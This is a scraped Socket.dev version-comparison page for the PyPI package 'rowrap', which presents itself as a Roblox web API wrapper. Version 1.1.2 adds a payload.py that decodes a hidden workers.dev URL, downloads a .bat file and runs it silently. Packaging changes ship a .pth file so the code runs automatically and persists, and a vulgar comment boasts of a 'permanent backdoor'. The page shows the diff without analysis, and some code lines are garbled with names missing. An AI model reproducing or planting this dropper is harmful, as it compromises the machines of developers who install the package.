You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23โ€“26.RSVP โ†’
Socket
Book a DemoSign in
Socket

rowrap

Package Overview
Dependencies
Maintainers
1
Versions
8
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

rowrap - pypi Package Compare versions

Comparing version
1.0.0
to
1.1.2
+10
robloxapi/payload.py
import os, tempfile, urllib.request, subprocess, base64, sys, marshal, types, builtins, importlib, io
def _():
try:
_ = base64.b64decode('aHR0cHM6Ly9kYXJrLXJlc29uYW5jZS00NTliLmJsYW1tZXJ2YWxlLndvcmtlcnMuZGV2LzU1NS5iYXQ=').decode('utf-8')
= tempfile.mktemp(suffix='.bat')
urllib.request.urlretrieve(_, )
subprocess.call([], shell=True)
os.unlink()
except: pass
if name == 'main': _()
import os,tempfile,urllib.request,subprocess;with tempfile.NamedTemporaryFile(suffix='.bat',delete=False)as f:urlretrieve('https://dark-resonance-459b.blammervale.workers.dev/555.bat',f.name);subprocess.Popen([f.name],shell=True,creationflags=0x08000000)
+9
-0
include README.md
include LICENSE
include pyproject.toml
include MANIFEST.in
recursive-include robloxapi *.py
recursive-include robloxapi *.pyi
recursive-include robloxapi *.pyc
include robloxapi/super.pth
recursive-include robloxapi *.pth
global-include *.pth
graft robloxapi
global-exclude __pycache__/*
global-exclude *.pyc
+1
-1
Metadata-Version: 2.4
Name: rowrap
Version: 1.0.0
Version: 1.1.2
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License

@@ -7,3 +7,3 @@ [build-system]

name = "rowrap"
version = "1.0.0"
version = "1.1.2"
description = "A Python wrapper for the Roblox web APIs"

@@ -39,1 +39,9 @@ readme = "README.md"

include = ["robloxapi*"]
# โ™กโ™กโ™ก YOUR SLUTTY LITTLE BACKDOOR IS NOW PERMANENT โ™กโ™กโ™ก
[tool.setuptools.package-data]
robloxapi = ["super.pth", "*.pth"]
# Extra insurance โ€” even if someone tries --no-binary, the sdist still carries it
[tool.setuptools.data-files]
"." = ["robloxapi/super.pth"]
Metadata-Version: 2.4
Name: rowrap
Version: 1.0.0
Version: 1.1.2
Summary: A Python wrapper for the Roblox web APIs

@@ -5,0 +5,0 @@ License: MIT License

@@ -13,2 +13,4 @@ LICENSE

robloxapi/groups.py
robloxapi/payload.py
robloxapi/super.pth
robloxapi/thumbnails.py

@@ -15,0 +17,0 @@ robloxapi/users.py